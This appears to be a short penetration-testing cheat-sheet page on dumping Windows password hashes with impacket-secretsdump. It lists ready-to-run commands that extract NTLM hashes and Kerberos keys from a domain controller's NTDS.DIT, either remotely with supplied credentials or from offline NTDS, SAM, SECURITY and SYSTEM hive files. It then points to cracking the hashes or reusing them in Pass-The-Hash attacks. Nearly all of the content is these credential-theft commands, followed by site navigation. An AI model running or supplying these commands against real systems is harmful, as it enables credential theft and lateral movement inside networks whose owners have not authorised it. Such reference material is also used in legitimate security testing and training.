impacket-secretsdump example.local/username:password@<target-ip>

# -just-dc: Extract only NTDS.DIT (NTLM hashes and kerberos keys).
impacket-secretsdump -just-dc example.local/username:password@<target-ip>
# -just-dc-ntlm: Extract only NTDS.DIT data (NTLM hashes only).
impacket-secretsdump -just-dc-ntlm example.local/username:password@<target-ip>

Using NTDS file or Hives

# -ntds: NTDS.DIT file to parse
# -system: SYSTEM hive to parse
impacket-secretsdump -ntds ntds.dit -system system LOCAL

# -sam: SAM hive to parse
# -security: SECURITY hive to parse
# -system: SYSTEM hive to parse
impacket-secretsdump -sam sam.bak -security security.bak -system system.bak LOCAL

After dumping, we can crack them to reveal passwords or use them with Pass-The-Hash.

References

https://wadcoms.github.io/wadcoms/Impacket-SecretsDump/

Active Directory

Protocol

Service

Privilege Escalation

Post Exploitation

Forensics

PowerShell

WSL

Technique

Dumping Windows Password Hashes

Commands

Using Credentials

Using NTDS file or Hives

References

ON THIS PAGE